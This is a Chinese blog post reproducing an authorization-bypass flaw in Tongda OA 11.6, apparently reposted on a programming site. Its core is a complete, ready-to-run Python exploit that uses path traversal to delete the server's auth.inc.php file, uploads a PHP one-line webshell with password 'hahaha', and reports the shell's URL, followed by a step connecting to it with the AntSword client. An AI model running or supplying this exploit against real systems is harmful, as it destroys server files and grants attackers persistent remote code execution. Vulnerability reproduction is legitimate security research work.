投稿
  1. 极客之音首页
  2. 后端漫谈

通达OA11.6版本越权漏洞复现

飞熊 后端漫谈 阅读 183

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 通达OA11.6版本越权漏洞复现,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

环境搭建

现在通达官网已经把版本升级到了11.7,所以下载11.6版本需要去第三方下载平台

安装OA

傻瓜式安装,配置界面如下。完成安装之后就可以暂时不用管它了
在这里插入图片描述
在这里插入图片描述

访问网站

界面如下:
在这里插入图片描述

使用exp脚本

脚本内容如下,核心思路就是删除网站里的一个名为auth.inc.php的文件,进而越权拿shell

import requests
#填写ip
target="http://ip/"  
#一句话木马的密码是hahaha   
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
#删除网站里的一个名为auth.inc.php的文件
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"  
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

在这里插入图片描述
程序执行之后出现了一个URL,那个URL就是一句话木马所在位置

蚁剑拿shell

在这里插入图片描述
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134377.html

(0)
飞熊的头像飞熊bm
0 0

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!